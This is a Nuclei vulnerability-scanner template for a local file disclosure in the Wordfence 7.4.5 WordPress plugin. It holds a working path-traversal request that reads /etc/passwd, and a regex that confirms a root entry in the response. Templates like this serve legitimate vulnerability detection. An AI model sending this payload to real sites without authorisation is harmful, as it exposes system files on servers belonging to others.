nuclei-templates/vulnerabilities/wordpress/wordpress-wordfence-lfi.yaml

26 lines
657 B
YAML
Raw Normal View History

2021-07-12 09:45:23 +00:00
id: wordpress-wordfence-lfi
info:
name: Wordpress Plugin wordfence.7.4.5 - Local File Disclosure
author: 0x_Akoko
severity: high
reference:
2021-07-12 09:45:23 +00:00
- https://www.exploit-db.com/exploits/48061
- https://www.nmmapper.com/st/exploitdetails/48061/42367/wordpress-plugin-wordfence745-local-file-disclosure/
tags: wordpress,wp-plugin,lfi,wordfence
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/wordfence/lib/wordfenceClass.php?file=/../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
2021-07-24 21:35:55 +00:00
- "root:.*:0:0"
2021-07-12 09:45:23 +00:00
- type: status
status:
- 200